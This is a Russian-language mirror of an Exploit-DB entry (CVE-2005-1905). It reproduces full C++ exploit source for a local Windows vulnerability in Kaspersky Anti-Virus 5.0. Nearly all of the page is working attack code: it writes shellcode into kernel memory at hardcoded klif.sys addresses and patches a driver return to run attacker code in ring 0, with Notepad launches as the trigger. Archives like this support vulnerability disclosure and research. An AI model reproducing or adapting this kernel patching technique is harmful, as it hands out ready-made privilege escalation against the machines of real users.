- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1032
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- ILYA RABINOVICH
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2005-1905
- Дата публикации
- 2005-06-07
		C++:
	
	/* Added NO_STRICT to 1 on line 2 /str0ke ! milw0rm.com */
#define NO_STRICT 1
#include <windows.h>
#undef STRICT
PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;
PDWORD pJmpAddress=(PDWORD)0xBE9372B0;
PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};
PUCHAR pKAVRet;
unsigned char code[]={0x68,0x00,0x02,0x00,0x00,	//push 0x200
					0x68,0x00,0x80,0x93,0xBE,	//push <buffer address> - 0xBE938000
					0x6A,0x00,					//push 0
					0xB8,0x00,0x00,0x00,0x00,	//mov eax,<GetModuleFileNameA> -> +13
					0xFF,0xD0,					//call eax
					0x68,0x00,0x80,0x93,0xBE,	//push <buffer address>
					0x68,0x00,0x82,0x93,0xBE,	//push <address of the notepad path>- 0xBE938200
					0xB8,0x00,0x00,0x00,0x00,	//mov eax,<lstrcmpiA> -> +30
					0xFF,0xD0,					//call eax
					0x85,0xC0,					//test eax,eax
					0x74,0x03,					//je +03
					0xC2,0x04,0x00,				//retn 4
					0x6A,0x00,					//push 0
					0x68,0x00,0x84,0x93,0xBE,	//push <address of the message string>- 0xBE938400
					0x68,0x00,0x84,0x93,0xBE,	//push <address of the message string>- 0xBE938400
					0x6A,0x00,					//push 0
					0xB8,0x00,0x00,0x00,0x00,	//mov eax,<MessageBoxA> -> +58
					0xFF,0xD0,					//call eax
					0xC2,0x04,0x00				//retn 4
					};
unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt [0xBE9372B0]
//////////////////////////////////////////////////////////////
BOOLEAN LoadExploitIntoKernelMemory(void){
//Get function's addresses
	HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
	HANDLE hUser=GetModuleHandle("USER32.DLL");
	FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
	FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");
	FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");
	*(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
	*(DWORD*)(code+30)=(DWORD)plstrcmpiA;
	*(DWORD*)(code+58)=(DWORD)pMessageBoxA;
//Prepare our data into ring0-zone.
	PCHAR pNotepadName=(PCHAR)0xBE938200;
	char temp_buffer[MAX_PATH];
	char *s;
	SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
	lstrcpy(pNotepadName,temp_buffer);
	PCHAR pMessage=(PCHAR)0xBE938400;
	lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");
	memmove(pCodeBase,code,sizeof(code));
	*pJmpAddress=(DWORD)pCodeBase;
	memmove(pKAVRet,jmp_code,sizeof(jmp_code));
	return TRUE;
}
///////////////////////////////////////////////////////////////
void UnloadExploitFromKernelMemory(){
	UCHAR retn_4[]={0xC2,0x04,0x00};
	memmove(pKAVRet,retn_4,sizeof(retn_4));
}
/////////////////////////////////////////////////////////////////
PUCHAR GetKAVRetAddress(void){
//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.
	UCHAR retn_4[]={0xC2,0x04,0x00};
	__try{
		for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){
			if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)
				return pKAVRets[i];
		}
	}__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not installed",NULL,0);return NULL;}
	MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of KAV",NULL,0);
	return NULL;
}
/////////////////////////////////////////////////////////////////
void main(void){
	pKAVRet=GetKAVRetAddress();
	if(NULL==pKAVRet)
		return;
	if(!LoadExploitIntoKernelMemory())
		return;
	char temp_buffer[MAX_PATH];
	char *s;
	SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
	PROCESS_INFORMATION pi;
	STARTUPINFO si={0};
	si.cb=sizeof(si);
	CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
						0,NULL,NULL,&si,&pi);
	WaitForSingleObject(pi.hProcess,INFINITE);
	MessageBox(NULL,"Now you may start your own Notepad instance to check this exploit!","KAV_EXPLOITER",0);
	MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);
	UnloadExploitFromKernelMemory();
}
// milw0rm.com [2005-06-07]- Источник
- www.exploit-db.com
 
 
		